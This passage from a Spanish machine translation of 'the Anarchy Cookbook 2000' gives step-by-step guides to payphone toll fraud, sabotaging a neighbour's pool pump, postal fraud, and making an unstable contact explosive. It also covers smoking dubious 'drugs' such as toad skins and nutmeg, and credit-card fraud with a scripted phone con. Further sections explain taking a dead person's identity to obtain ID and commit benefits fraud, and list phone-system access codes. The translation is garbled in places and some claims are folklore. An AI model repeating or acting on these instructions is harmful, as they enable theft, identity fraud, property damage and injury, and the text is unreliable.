Ahora, a la materia aseada. Lo que se hace, en vez de desenroscar la pegada en la boquilla, se inserta el clavo en el orificio central de la boquilla (donde se habla) y empújelo con la presión o simplemente clavar golpeando el clavo en algo. Simplemente NO MATAR LA BOQUILLA! Usted podría dañar si se inserta el clavo demasiado lejos o en un ángulo extraño. Si esto sucede, entonces la otra parte no va a ser capaz de oír lo que dices. Ahora tiene un agujero en la boquilla en la que usted puede insertar fácilmente el clip de papel. Por lo tanto, sacar el clavo y poner en el clip de papel. A continuación, tome el otro extremo del clip de papel y meterlo en el protector de cable de goma en la parte inferior del teléfono (ya sabes, el tipo azul ...). Esto debe terminar para arriba en busca remotamente parecido ... de esta manera:

/ ---------- \ Boquilla :: Clip de papel -> :: / : / ---: --- \ ::: : ------------> ==================== \ ---))): : Para el auricular -> ^ ^ \ --------------------> :: :: Cordón Blue chico

(El clip se metió en el hombre azul para hacer una buena conexión entre el interior de la boquilla y el cable de metal.) Ahora bien, marcar el número de un número local al

Page 87: 106652012 the Anarchy Cookbook 2000 Es

que desea llamar, sayyyy, MCI. Si todo va bien, debería sonar y no responder con la "La Llamada Usted ha hecho requiere un depósito de 20 Cent" la grabación. Después de que el otro extremo contesta el teléfono, retire el clip. Todo es tan sencillo, ¿ves? Hay un par de problemas, sin embargo. Uno de ellos es, como he mencionado antes, no la boquilla de trabajo después de recortarla. Si esto le sucede a usted, sólo tiene que pasar a la cabina telefónica al lado. La que ahora están en está perdido. Otro problema es que los tonos al tacto no funcionará cuando el clip se encuentra en la boquilla. Hay dos formas de evitar esto ..

1. Marque los 6 primeros números. Esto debe hacerse sin el clip de realizar la conexión, es decir, uno de los lados no debe ser conectado. A continuación, conecte el clip, mantenga presionado el último dígito, y lentamente hale el clip a cabo al final de la boquilla.

2. No utilice el clip de papel en absoluto. Mantenga las uñas en el después de recortarla. Marque los 6 primeros dígitos. Antes de marcar el último dígito, toque la cabeza del clavo a la placa en el cuerpo principal del teléfono, la cosita dinero seguro .. a continuación, pulse el último número. La razón de que este método se llama a veces el boxeo es clara porque hay otro tipo de teléfono que le permite realizar la llamada realidad y escucharlos decir: "Hola, hola?" pero se corta la boquilla para que no pueda oírle. La caja transparente que se utiliza en para amplificar las señales de voz y enviarlo a través del auricular. Si usted ve cómo esto es incluso un poco similar al método que acabo de describir arriba, por favor me lo explique! Porque yo no lo entiendo! De todas formas, esto no funciona en casi todos los de una sola ranura, marcar teléfonos primer tono (Pacific Bell para el seguro). Yo lo hago todo el tiempo. Esto es lo menos, yo menor estrés * *, forma arriesgada de Phreaking.

82. Fun Pool por The Jolly Roger

En primer lugar, usted necesita saber nada acerca de las piscinas. La única cosa que usted necesita saber es lo que un filtro de la piscina parece. Si usted no sabe eso. En segundo lugar, vestir casual. Preferiblemente, en negro. Visite a su "amigo" casa, el que tiene la piscina se ve divertido! A continuación, se invierte la polaridad de su su / piscina, al cambiar los cables alrededor. Se encuentran en la parte posterior de la bomba. Esto tendrá un efecto bastante cuando la bomba se enciende. En otras palabras. Boooooooooooommm! Así es, cuando se mezclan con los cables + - enchufes, y viceversa, el 04 de julio vuelva a suceder. No a la destrucción total?? Cuando la bomba está apagada, encienda la bomba de "lavado". Encienda la bomba y obtener el phuck fuera! Cuando se mira al día siguiente, phunny. La piscina está seca. Si quieres un daño permanente, sin embargo, no se muestra tan grande como mi único mencionado por primera vez, se cierran las válvulas de la piscina fuera. (Hay por lo general 2) Una que va al desagüe principal y una que va al filtro en la piscina. Eso debería ser suficiente para tener una bomba de muertos. La bomba debe tener en el agua, así que cuando no hay ninguna ... Bromas: estos seres próximos frente a verdaderos amigos yno es * no * daño permanente. Si usted tiene una piscina, debe comprobar la piscina con productos químicos. Hay un ortotolidina etiquetados. La otra se denomina alcalina (pH). ¿Quieres ortotolidina. (Comprueba el cloro). Vaya a su tienda local de la piscina y decirles que vamos en el negocio de la piscina, y de vender ortotolidina (un detector de CL) Compra en grandes cantidades si es posible. La solución es transparente. Llenas 2 bolsitas con esta sustancia química. Y coser las bolsas en el interior de su traje. A continuación, ir a nadar con su amigo! A continuación, abra las bolsas y parece que está disfrutando de una meada. Y a nadie se volverá de color rojo oscuro! Ellos se avergüence tanto, sobre todo si tenemos invitados allí! Explique lo que es, a continuación, agregar el vinagre a la piscina. Sólo un poco. El "piss" desaparece.

83. Envío gratis por The Jolly Roger

El aumento del costo de envío para enviar cartas y paquetes está haciendo bajar nuestro nivel de vida. Para poner remedio a esta deplorable situación, algunas medidas de control de venta libre se pueden aplicar. Por ejemplo, si los sellos en una carta están

Page 88: 106652012 the Anarchy Cookbook 2000 Es

cubiertos con pegamento de Elmer por el remitente, la marca de la cancelación no va a destruir el sello: las unidades de la de Elmer para formar una capa casi invisible que protege a los sellos de la tinta de cancelación. Más tarde, el receptor de la carta puede quitar la marca de cancelación con agua y reutilizar los sellos. Además, el ahorro ecológico también será el resultado de reciclado de los sellos. Ayuda a salvar un árbol. La cola es más eficiente aplicar con un pincel, con rigidez, cerdas cortas. Sólo sumerja el cepillo directamente en la cola y la extendió sobre uniformemente, cubriendo toda la superficie del sello. Se va a secar en unos 15 minutos. Para los paquetes de correo, sólo tienes que seguir el mismo procedimiento descrito anteriormente, sin embargo, el paquete debe ser pesado y revisado para asegurarse de que tiene la cantidad correcta de franqueo en él antes de que sea llevado a la oficina de correos. Extracción de la cancelación y la cola de los sellos se puede lograr fácilmente empapando los sellos en agua tibia hasta que flotan libremente en el papel. Los sellos se pueden poner en una toalla de papel para secarse. Sellos de procesamiento en grandes lotes ahorra tiempo también. Además, puede ser útil para escribir 'Elmer' de la palabra en la parte superior de la carta (no en el sobre) para realizar una escucha de la parte receptora en la que los sellos se han protegido con el pegamento. Todos sabemos que los paquetes de correo puede ser costoso. Y también sabemos que las personas con discapacidad son a veces objeto de discriminación en el empleo. El Gobierno, siendo las personas generosas que son, han dado a los ciegos servicio de correo gratuito. Basta con que abordar sobre como es habitual, y hacer una modificación. En la esquina donde la marca se vaya, escriba (o sello) independientemente de las palabras "libre para los ciegos". A continuación, se le cae el paquete o la carta en uno de los buzones azules federales. NO TOME LA CARTA A LA OFICINA DE CORREOS, NI deja en su casilla de correo. suena muy bien del gobierno para hacer esto, ¿verdad? Bueno, no son tan agradables. El paquete se envía tipo de biblioteca, que está por debajo de tercera clase. Se puede tomar de cuatro a cinco días para enviar una carta de a poco la ciudad más próxima. Esto también es bastante simple, pero menos eficaz. Ponga la dirección que va a enviar la carta a la dirección de devolución. Si usted fuera a enviar una donación de $ 20 en el pecho del pirata, se pondría a nuestra dirección (Apartado de correos 644,Lincoln MA 01773) Como la dirección de retorno. A continuación, tendría que ser descuidado y se olvide de poner el sello en el sobre. Un buen detalle es poner una dirección de mierda en el centro del sobre. Una vez más, debe quitar la carta en un buzón de correo FEDERAL. Si la oficina de correos no envía la carta a la dirección de retorno por no tener sello, lo van a enviar de vuelta por la razón de la "dirección no existe".

Ejemplo:

Piratas Pecho Departamento 40DDP.O. Caja 644865Lincol, Ma. 41773

Tom Bullshit20 Camino de Fake¿Qué fue, XX 99851

Una última cosa que usted puede tratar de hacer es empapar un sello de cancelado fuera de un sobre, y pegándolo en una que está enviando. A continuación, grabar el sello, dejando un poco para mostrar que no había nadie allí.

84. Explosivos inestables por The Jolly Roger

Mezclar yodo nítrico sólido con amoníaco de uso doméstico. Espere toda la noche y luego verter el líquido. Usted se quedará con una sustancia barrosa. Que este seco hasta que se endurezca. Ahora tirar de algo!!

85. Drogas extraños por The Jolly Roger

Bananas:1. Obtener 15 libras de bananos maduros de color amarillo.

Page 89: 106652012 the Anarchy Cookbook 2000 Es

2. Pelar todo y comer la fruta. Guardar las cáscaras.3. Raspe todo el interior de las cáscaras con un cuchillo afilado.4. Ponga todo el material removido en una olla grande y agregar el agua.5. Hervir 3 o 4 horas hasta que se haya alcanzado una consistencia de pasta sólida.6. Spread pegar en las bandejas para hornear y secar en el horno durante unos 20

minutos. Esto resultará en polvo fino de color negro. Por lo general, uno se sentirá los efectos después de fumar tres o cuatro cigarrillos.

Jarabe contra la tos:Mezclar Robitussion de CA con la misma cantidad de cerveza de jengibre y bebidas. El efecto es la sedación y euforia. Nunca hay que subestimar los efectos de cualquier droga! Puede diámetro exterior, en jarabe para la tos!

Sapos:1. Recoger cinco-diez sapos, ranas, no funcionará. El mejor tipo de árbol son los

sapos.2. Acaba con ellos la forma menos dolorosa posible, y de inmediato la piel.3. Permita que la piel se seque en un refrigerador de cuatro a cinco días, o hasta que

las pieles son frágiles.4. Ahora aplastar las pieles en el polvo y el humo. Debido a su mal gusto se puede

mezclar con un medio de fumar más fragante.

Nuez moscada:1. Tome varias nuez moscada enteras y molerlas en una amoladora de edad.2. Después de la nuez moscada se muelen. Coloque en un mortero y pulverizan con un

mortero.3. La dosis habitual es de unos 10 o 15 gramos. Una dosis mayor puede producir sed

excesiva, la ansiedad y el latido del corazón rápido, pero las alucinaciones son raras.

Maní:1. Tome 1 libra de maní crudo (sin tostar).2. Shell ellos, salvar la piel y el descarte las conchas.3. Comer los frutos secos.4. Triturar hasta las pieles y el humo ellos.

86. El arte de cardado por The Jolly Roger

La obtención de un número de tarjeta de crédito: Hay muchas maneras de obtener la información necesaria para algo de la tarjeta. Las cosas más importantes que se necesitan son el número de tarjeta y la fecha de caducidad. Con el nombre de los titulares de la tarjeta no hace daño, pero no es esencial. La manera más favorable para obtener toda la información necesaria es por destrozar. La manera de hacer esto es sencillo. Usted camina alrededor de su área o cualquier otra área y encontrar una tienda, centro comercial, supermercado, etc, que tira su basura en la acera o el contenedor de basura. Extraer la bolsa de abrir y ver si puede encontrar átomos de carbono en absoluto. Si usted encuentra fragmentos pequeños de átomos de carbono de tarjetas de crédito, entonces es muy probable que no vale la pena su tiempo para grabar juntos. Encontrar una tienda que no rasga sus átomos de carbono en absoluto o sólo en la mitad. Otra forma es una mierda el número de alguien. Eso es llamar y decir "Hola, esto es seguridad Visados y tenemos un informe que su tarjeta fue robada." Ellos lo niegan y que tratará de salir de ellos a partir de ese momento. Se podría decir, "No fue robada? Bueno, lo que es la fecha de caducidad y tal vez podamos solucionar el problema .... OK y ¿cuál es el número que aparece en su tarjeta? ...... Muchas gracias y tienen un buen día. " O pensar en algo a ese grado. Otra forma de obtener números de tarjetas es a través de sistemas tales como TRW y la ICC, ese es el camino difícil, y probablemente no vale la pena, a menos que usted sea un experto en el sistema. El uso de números de tarjetas de crédito publicados en BBS es arriesgado. La única ventaja es que hay una buena probabilidad de que otras personas lo usarán, lo que disminuye las posibilidades de ser el autor único. El último método de conseguir los números es muy bueno también. En la mayoría de tiendas de alquiler de videos, se llevan su número de tarjeta de crédito cuando se unen para copias de seguridad de sus alquileres. Así que

Page 90: 106652012 the Anarchy Cookbook 2000 Es

si lograba robar la lista o hacer una copia de la misma, entonces se establecen para un largo tiempo. Elección de una víctima: Una vez que tenga el número de tarjeta, es el momento de realizar el pedido. El tipo de lugares que son más fáciles para hacerlos sus victimas son las pequeñas empresas que hacen pedidos por correo o incluso las tiendas locales que ofrecen. Si usted tiene un anuncio para un lugar con algo que desea y el número de orden no es un número 1-800 entonces las posibilidades son mejores que usted tendrá éxito.

OrdenCuando se llama el lugar para hacer el pedido, usted debe tener varias cosas a la mano. Estas son las cosas que usted necesita: un nombre, número de teléfono, teléfono de la empresa, número de tarjeta (4 dígitos del código del banco si la tarjeta es MasterCard), fecha de vencimiento, y una completa para el envío y la dirección de facturación. Voy a hablar de todo esto en detalle. Un consejo personal: Cuando me llame para hacer un pedido, por lo general va mucho más suave si la persona que está hablando es de una mujer. En muchos casos son más crédulos que los hombres. El nombre: Se puede usar el nombre en la tarjeta o el nombre de la persona que le va a enviar la mercancía. O usted podría utilizar el nombre en la tarjeta y que se lo envíen a la persona que vive en la caída (Di que no es un regalo o algo así). El nombre no es realmente tan importante, porque cuando la empresa comprueba la tarjeta, el nombre de las personas nunca se menciona, excepto cuando usted tiene una tarjeta Visa de Preferencia. Entonces el nombre se menciona. Usted puede saber si usted tiene una tarjeta Visa Preferencia por el PV a la derecha de la fecha de caducidad en el carbono. No hay teléfono todo el día esperando para que la compañía llama (que ellos), entonces el número de teléfono para darles a su casa-teléfono podría ser una de las siguientes: Es un número que siempre está ocupado, un número que siempre llama, un número de teléfono de pago, extremo inferior de un bucle (y va a esperar en el otro extremo), o un BBS populares. NUNCA les de el teléfono de su casa, ya que se encuentra tan pronto como se inicia la investigación, que el teléfono pertenece. Lo mejor sería tener una llamada de teléfono público hacia su casa (a través de Cosm El número de negocios.) Cuando se le pida, repetir el número que utilizó para su teléfono de casa. Número de tarjeta: Las tarjetas que va a utilizar será Visa, Mastercard y American Express. Lo mejor está por Visa hasta el momento. Es la más sencilla. Mastercard está muy bien excepto por el código del banco. Cuando se solicite el código de banco, a veces también pedir al banco que lo emitió. Cuando pedimos que acaba de decir el banco más grande sabes de en su área. Trate de evitar las tarjetas American Express. Tienden a llevar a cabo investigaciones a escala real. Por desgracia, American Express es el cabo de cartas más popular. Al decirle a la persona que está tomando la llamada el número de tarjeta, digamos las cosas con calma, clara y con confianza. por ejemplo CC # es 5217-1234-5678-9012. Haga una pausa después de cada conjunto de cuatro por lo que no tiene que repetirlo. Fecha de vencimiento: La fecha debe tener por lo menos en ese mes. Es mejor, con más de tres meses para el final. La dirección: Más comúnmente conocida como el 'drop'. Bueno, la gota puede variar de un edificio abandonado a su apartamento al lado de los vecinos. Si va a enviar a un edificio de apartamentos a continuación, asegúrese de no incluir un número de apartamento. Esto confundirá a los hombres de envío de UPS o un poco y van a dejar el paquete en el vestíbulo. Aquí está una lista de gotas diferentes: La casa de al lado, cuya familia está de vacaciones, el apartamento que se ha movido justo fuera de la iglesia vieja que se derribó en seis meses, su casa de un amigo que no tiene absolutamente nada que ver con la tipo de mercancía que se compra y que tampoco se rompe bajo el calor de los federales, etc. También hay servicios que tienen mercancía para usted, pero yo personalmente no confío en ellos. Y olvídate de P.O. Las cajas ya que necesita de identificación para obtener una mayoría de los lugares y no enviamos a ellos de todos modos. Otros aspectos de cardado: Tarjetas de verificación, ver si se les denuncia por robo. Verificación de tarjetas: Tiendas necesario para verificar las tarjetas de crédito cuando alguien compra algo con una. Ellos llaman a un servicio que comprueba si el cliente tiene el dinero en el banco. El comerciante se identifica con una serie de comerciante. El servicio a continuación, guarda el dinero que el comerciante verificado en la reserva. Cuando el comerciante envía en forma de tarjeta de crédito, el servicio envía al comerciante el dinero. El servicio tiene el dinero para tres días y si no hay forma de que aparezca a continuación, se vuelve a poner en el banco. El punto es que si usted quiere comprobar algo, entonces usted debe comprobar para una pequeña cantidad y las probabilidades son de que habrá más en el banco. Lo bueno de la verificación es que si la tarjeta no existe o si se lo roban a

Page 91: 106652012 the Anarchy Cookbook 2000 Es

continuación, el servicio te lo diré. Para verificar MasterCard y Visa tratar este número. Es la voz: 1-800-327-1111 Código de comerciante es 596719. Cartas Robadas: Mastercard y Visa vienen con un pequeño catálogo cadasemana en la que se publicará cada tarjeta robada o usada de manera fraudulenta. Me sale esto cada semana por destrozar el mismo lugar en el mismo día. Si alguna vez encuentra que destrozar a continuación, tratar de conseguir que todas las semanas. Tarjetas de identificación: el número de tarjetas Visa comienzan con un 4 y tiene 13 ó 16 dígitos. Números de tarjetas de MasterCard comenzar con un 5 y tiene 16 dígitos. American Express se inicia con un 3 y cuenta con 15 dígitos. Todos ellos tienen los formatos de la siguiente:

3xxx-xxxxxx-xxxxx American Express4xxx-xxx-xxx-xxx Visa4xxx-xxxx-xxxx-xxxx Visa5xxx-xxxx-xxxx-xxxx MasterCard

Tarjetas de oro: Una tarjeta de oro, simplemente significa que el crédito es bueno para $ 5000. Sin una tarjeta de oro, el crédito sería normalmente $ 2000. Para reconocer una tarjeta de oro en un carbono hay varias técnicas:American Express, ninguno.Visa-PV lugar de residencia.

Nota: Cuando la verificación de una visa de PV, usted tiene que tener el nombre real del titular de la tarjeta.Mastercard-El asterisco puede significar una tarjeta de oro, pero esto varía según si la tarjeta fue publicada. Voy a escribir un diálogo entre una carda y el operador de telefonía que le ayudarán a hacerse una idea.

Operador: "Con el precio bienes de informática, qué puedo ayudarle?"Carder: "Hola, me gustaría hacer un pedido por favor."Operador: "Claro, ¿qué te gustaría hacer un pedido?"Carder: ". 400 discos genéricos y un disco de doble densidad"Operador: "Ok, ¿hay algo más?"Carder: "No, gracias, eso es todo por hoy."Operador: "Ok, ¿cómo te gustaría que pagar por este MasterCard o Visa?"Carder: ". Visa"Operador: "¿Y su nombre es?"Carder: ". Lenny Lipshitz" (Nombre en la tarjeta)Operador: "Y el número de su tarjeta Visa es?"Carder: "4240-419-001-340" (tarjeta no válida)Operador: "La fecha de vencimiento?"Carder: ". 06-92"Operador: "¿Y dónde le gustaría que el paquete enviado a?"Carder: "6732 Goatsgate Puerto. París,Texas, 010166. "Operador: "¿Y cuál es su número de teléfono de su casa?"Carder: "212-724-9970" (Este número es, en realidad siempre está ocupado)Operador: "Yo también necesitará su número de teléfono de la empresa en caso de que tenga que llegar".Carder: ". Puedes contactar conmigo en el mismo número 212-724-9970"Operador: "OK Muchas gracias y tener buen día."Carder: "Disculpe, cuando llegará el paquete?"Operador: ". En seis o siete días de UPS"Carder: "Muchas gracias, y tener un día agradable."

Ahora espera 6-7 días cuando el paquete llegará a la dirección que es en realidad una casa para la venta. Habrá una nota en la puerta diciendo: "Hola UPS, favor de dejar todos los paquetes de Lenny Lipshitz en el vestíbulo o porche. Muchas gracias, Lenny Lipshitz" (Hacer la firma a mitad de camino convincente)

87. Reconociendo las tarjetas de crédito por The Jolly Roger

[Ejemplo: American Express]

Page 92: 106652012 the Anarchy Cookbook 2000 Es

XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 Y1 John Doe AX

Explicación:La primera fecha es la fecha en que la persona tiene la tarjeta, la segunda fecha es la fecha de vencimiento, después de la fecha de vencimiento es los mismos dígitos en el primer año. El Gold American Express tiene muchos números más (creo que 6 8 a continuación, 8). Si usted encuentra una tarjeta de oro mantenerlo ya que tiene una copia de seguridad de $ 5.000,00, incluso cuando el tipo no tiene dinero!

[Ejemplo: Master Card] 5XXX XXXX XXXX XXXX XXXX AAA DD-MM-AA MM / AA John Doe.

Explicación:El formato varía, nunca he visto una tarjeta que no se inició con una 5XXX hay otro 4 dígitos en la siguiente línea que a veces se pedían cosas en el pedido, por un combo, y rara vez la carta de 3 dígitos (E. ANB). El primera fecha es la fecha en que la persona recibió la tarjeta y la segunda fecha es la fecha de caducidad. Master Card se aceptan casi siempre en las tiendas.

[Ejemplo: VISA] XXXX XXX (X) XXX (X) XXX (X) MM / AA MM / YY * VISA John Doe

Explicación:Visa es la más directa de las tarjetas, ya que tiene el derecho de nombre en la tarjeta en sí, una vez más la primera fecha es la fecha en que recibió la tarjeta y el segundo es la fecha de caducidad. (A veces, la primera fecha se queda fuera). Los números pueden ser 4 3 3 3 o 4 4 4 4. Visa también está casi siempre aceptada en las tiendas, por lo tanto, la mejor de las tarjetas para su uso.

88. Cómo crear una nueva identidad del espurio Ruta

Usted podría estar diciendo, "Hey Glitch, ¿qué necesito una nueva identidad?" La respuesta es simple. Es posible que desee ir a comprar licor en alguna parte, ¿no? Es posible que desee ir a dar a la policía el nombre falso cuando llegue roto por lo que mantener su buen nombre, ¿eh? Puede ser que incluso desee utilizar la nueva identidad para conseguir una orden de compra Caja de cardado. ¡Claro! Puede ser que incluso quieren las cosas para el alquiler de ti mismo un reproductor de vídeo en algún perdedor dickless de una tienda de conveniencia. Aquí vamos: Obtención de una nueva identificación no siempre es fácil, nadie dijo que sería. Siguiendo estos pasos, cualquier tarado puede convertirse en un payaso nuevo en un par de semanas.

PASO 1

El primer paso es averiguar exactamente quién te convertirás. La forma más segura es utilizar ID de alguien que no lo usan ellos. Las personas que encajan en ese proyecto de ley mejor que estén muertos. Como ventaja adicional, que no van quejándose un poco. Ir a la biblioteca y mirar a través de esquelas de edad. Tienes que encontrar a alguien que nació casi al mismo tiempo como tú, o mejor aún, un año o dos años para que pueda comprar alcohol, etc Hay que ir hacia atrás tanto como pueda de la muerte porque la mayoría de los estados ahora cruzan muertes índice al parto para que la gente no puede hacer esto en el futuro. La fecha de corte en Wisconsin es 1979, la gente en este gran estado consiguió mirar en el año 1978 o antes. Todo lo anterior no es fresco. Ahora bien, esta es la parte más difícil si eres joven. Palos de golf que los jóvenes pasan a ser muy resistentes, teniendo caídas de cada tres ventanas del piso y comiendo veneno para ratas al igual que sus dulces de Pascua, y ni un rasguño o abolladura. No hay muchos que mueren, por lo que ya tengo que mirar a tu culo. Ir a la biblioteca y buscar todos los avisos de defunción que usted puede, si es en microfilm, tanto mejor. Es

Page 93: 106652012 the Anarchy Cookbook 2000 Es

posible que tenga que pasar por meses de esquelas mortuorias, sin embargo, pero los resultados valen la pena. Tienes que conseguir a alguien que murió de forma local en la mayoría de los casos: el certificado de defunción se presentó sólo en el condado de la muerte. Ahora ir a la corte del condado en el condado donde murió y obtener el certificado de defunción, esto le costará alrededor de $ 3 - $ 5, dependiendo del estado en el que está adentro Mira este trozo de papel, que podría ser su manera de desaparecer en una nube de humo, cuando llegue el momento oportuno, al igual que la derecha después de que la gran estafa. Si tienes suerte, los padres patanes lo firmó con la seguridad social cuando era un mocoso nariz mocos. Eso va a ser otro documento de identificación que puede obtener. Si no, eso está bien también. Va a ser incluido en el certificado de defunción si lo tiene. Si tienes suerte, la rigidez nació a nivel local y se puede obtener su certificado de nacimiento de inmediato.

PASO 2

Ahora compruebe el lugar de nacimiento en el certificado de defunción, si es en el mismo lugar que de pie ahora ya está todo listo. Si no es así, usted puede enviar fuera por uno de ese condado, pero es un dolor leve y que podría tomar un tiempo para llegar, el bibliotecario de la recepción cuenta con un listado de dónde escribir para esta materia y exactamente cuánto cuesta. Obtener el certificado de nacimiento, vale la pena el dinero extra para conseguir que la certificación porque esa es la única manera de que algunas personas lo aceptarán para la identificación. Cuando usted está recibiendo este material las formas poco pregunte por la razón que usted lo desea, en lugar de escribir en "Fuck you", trate de poner en la palabra "genealogía". Consiguen esto todo el tiempo. Si el certificado de defunción se ve bien para usted, espere un día o dos antes de obtener el certificado de nacimiento en caso de que reconocer a alguien que lo precise en un tipo muerto.

PASO 3

Ahora tu cocina! ¿Tienes el inicio y la siguiente parte es fácil. Crank a cabo su vieja impresora de matriz de puntos y salir corriendo algunas etiquetas de correo dirigido a usted a alguna dirección falsa. Tómese el tiempo para verificar su dirección falsa que no existe tal lugar. Hoteles de que la renta por los edificios de apartamentos al mes o grandes son buenos, asegúrese de obtener el código postal correcto para el área. Estas son cosas que la policía podría notar que el viaje será para arriba. Coge un poco de correo basura vieja y pegar las etiquetas nuevas en ellos. Ahora tomarlos junto con el certificado de nacimiento a la biblioteca.

Obtener la tarjeta nueva. Si te preguntan si tienes uno antes de decir que realmente no está seguro debido a que su familia se mudaba mucho cuando eras un niño. La mayoría de las bibliotecas le permiten utilizar las cartas como una forma de identificación cuando usted reciba su tarjeta. Si quieren más darles una triste historia sobre cómo fue asaltado y recibió su robaron la cartera con todo su identificación. Su tarjeta debe estar esperando a que en unas dos semanas. La mayoría de las bibliotecas piden dos formas de identificación, uno puede ser su acta de nacimiento de confianza, y ellos permiten hacer cartas dirigidas a usted como un segundoformulario.

PASO 4

Ahora usted tiene un comienzo, no es perfecto todavía, así que vamos a continuar. Usted debe tener dos formas de identificación actual. Tire a la basura las viejas cartas, o mejor aún, los mete dentro de la carpeta que desea utilizar con esta materia. Ir a la corte del condado y mostrarles lo bonito que tienes ID y obtener una tarjeta de identificación estatal. Ahora usted tiene una identificación con fotografía. Esto tomará alrededor de dos semanas y cuesta alrededor de $ 5, ¡vale la pena.

PASO 5

Si el certificado de defunción tenían un número de seguro social en el que se puede salir a comprar una de esas tarjetas de metal Número de Seguro Social que venden. Si no fuera así, entonces usted tiene todo tipo de ID bonita que muestra exactamente quién es

Page 94: 106652012 the Anarchy Cookbook 2000 Es

usted. Si usted todavía no tiene un Número de Seguro Social, Baja y solicitar uno, estos son gratuitos, pero que podría tomar cinco o seis semanas en llegar, los burócratas Sabías que ... Puedes inventar un Número de Seguro Social también si se quiere, pero el lema de 'El fallo CAMINAR' siempre ha sido "¿Por qué no la excelencia?".

PASO 6

Si quieres ir todo el cerdo ahora se puede obtener una cuenta bancaria a su nombre nuevo. Si usted planea hacer un montón de viajar entonces usted puede poner un montón de dinero en la cuenta y luego dicen que ha perdido el libro de cuentas. Después de obtener el nuevo libro que sacar todo el dinero en efectivo. Ellos le golpeó con una ligera carga y quizás atar su dinero-algunos, pero si alguna vez se rompió en algún pueblo pequeño que el libro de banco a evitar que se metieron en la cárcel como vagabundo.

TODO HECHO?

Así que chicos, tienes ID para la compra de alcohol, pero ¿qué más? En algunas ciudades (cuanto mayor sea la más probable) a la policía si te pillan por algo insignificante como la materia de robo en una cierta cantidad de dólares, sólo le dará un boleto, lo mismo para mear en la calle. ¡Eso es! No hay huellas ni nada, sólo pagar la multa (casi siempre más de US $ 100) o ante el tribunal. Por supuesto que ejecutar una comprobación de la radio en su identificación, se le limpia y su alter-ego se pone una mancha en su historial. Su libre y claro. Que vale la pena el precio de la pena de haber pasado por allí. Si la tarjeta inteligente, te tiro que el identificador de inmediato si esto sucede, o mejor aún, desprenda su imagen y dar la identificación a alguien que no te gusta, tal vez van a tener roto con él. Si usted es un duro trabajo, aquí está una manera de estirar su dólar. Ir a trabajar durante el tiempo que tarda en llegar el desempleo y luego se disparó. Ir a trabajar bajo el nombre de otro mientras te estas haciendo el desempleo. Con un par de series de identificación, puede vivir como un rey. Estos conceptos para la supervivencia en la nueva era venir a ustedes por cortesía de la falla CAMINAR.

89. Remoto Informador Edición N º 2 por el Tracker, Norman Bates, y el capitán Ye

Raggers y BraggersEsta sección es para advertirle de conocidos raggers y braggers. Dado que esta es la primera vez que se imprime esta sección, le diremos lo que clasifica a las personas como raggers y braggers. En las futuras ediciones de los principales raggers braggers y será incluido en este boletín de noticias para que los Sysops saber quién no permitir que en su junta directiva, o a por lo menos mantener un ojo en. Un ragger es alguien que va a poner a otra persona por algo. La persona puede enviar un mensaje haciendo una pregunta novato acerca de hacking y phreaking, o puede decir algo que es completamente erróneo, y un ragger pondrá a la otra persona ya que dijo, publicado, etc Los que suelen clasificar en esta categoría son los que piensan que lo saben todo y se consideran correcto, no importa lo que digan. La mayoría de los usuarios que utilizan los códigos y se consideran un maestro por lo general se phreaker raggers.

Un fanfarrón es una persona que ya sea que hace o piensa que lo sabe todo, y lo pone a sí mismo para decirle al mundo entero que él lo sabe todo. Esta persona también es aquel que piensa que es mejor que los demás y él cree que es la élite, y no hay nadie más. Las personas que tienden a hacer esto son los que han, por alguna razón, se convierten en bien conocido en el bajo, y como resultado de ser un fanfarrón. Aquellos por lo general no demasiado conocido no tienden a presumir tanto como aquellos que piensan que todo el mundo le encantaría ser su amigo y ser como ellos.

Como ragger muy conocido y fanfarrón, el sapo, se enteró de que no ayuda a que uno o ambos de ellos. Desde entonces, ha cambiado y ahora es fácilmente aceptado por la mayoría. La mayoría de la gente le gustaba porque otros que sabían había dicho algo malo de él. Esto se llama presión de grupo y es una mala influencia para aquellos que son nuevos en el mundo subterráneo. Me permito sugerir en el futuro, a no juzgar a alguien por lo que otros dicen, sino por su manera de actuar en torno a / a. El Atarian

Page 95: 106652012 the Anarchy Cookbook 2000 Es

actual más popular que clasifica como un fanfarrón y un ragger es As de ases, y es muy odiado por muchos usuarios y operadores de sistema, ya que tiende a poner cualquier cosa que digan los demás y se considera el mejor en la escritura de programas de hacking. Comúnmente se le conoce como culo de los Asnos y culo de gilipollas. Incluso manteniendo una mente abierta acerca de este tipo, que pronto llegará a descubrir que lo que otros dijeron que coincide con lo que se ve de él.

Un nuevo 950 ha llegado!LDDS, que como se mencionó anteriormente compró a TMC, es la instalación de un nuevo puerto a 950 ciudades más importantes. En el momento en que usted lea esto, que debería estar en casi todas las áreas que soporta 950 puertos. El número es 950-1450. Este puerto será marcar los números 976, pero no 700, 800, 900 o los números. El método de marcación de LDDS es: código de 7 dígitos, a continuación, incluso si el código es malo que le dará un tono de marcado. A continuación, marque el código de área más el número. Si usted tiene un código incorrecto, simplemente se dice que su llamada no puede completarse, ya que se ha marcado. Hay un código predeterminado que se utiliza en el sistema que actualmente funciona. El código es simplemente, 1234567. He visto los códigos a partir de 5 empresas diferentes y todos ellos están en el formato de 00xxxxx. No sé qué tipo de software que utilizan, pero voy a saber el próximo número exactamente lo que le dan a los proyectos de ley. Esto podría ser la respuesta a una gran cantidad de problemas de la gente con el miedo de Sprint y la ITT, especialmente AllNets. Sólo recuerde, el perseguidor es el único que encontré esto, y toda la información al respecto. Si alguien es visto diciendo que han encontrado esto, entonces se mostrará en la próxima edición que contendrá un artículo sobre las sanguijuelas.

Sistemas de buzonesSistemas de buzones de correo son el enlace entre la información y el inframundo. Si alguna vez se llamó a uno, entonces usted sabrá las ventajas de tener una, especialmente los que están abiertos a todo mundo subterráneo, en lugar de sólo unos pocos elegidos. Hay dos tipos de sistemas de buzón que se utilizan ampliamente. El primer tipo vamos a hablar es de los sistemas de buzón de correo múltiples, o comúnmente conocido como los sistemas de mensajes. Estos sistemas tienen varios buzones de correo configuradas en un solo número. Por lo general, usted puede tener acceso a otros buzones de ese número pulsando la tecla '*' o '#'. A veces, simplemente ingrese el número del buzón y que están conectados. Estos son los sistemas más seguros de utilizar para proteger la información de EE.UU. Sprint y otras compañías de larga distancia. Desde EE.UU. Sprint y otras compañías llamar a los números de destino, es más seguro tener 800 sistemas de buzón de correo, y la mayoría de las veces, los sistemas de buzón de múltiples están en los números 800. El código de acceso en estos sistemas puede variar en longitud y se puede acceder por varios métodos diferentes, por lo que es imposible explicar exactamente cómo hackear estos sistemas.

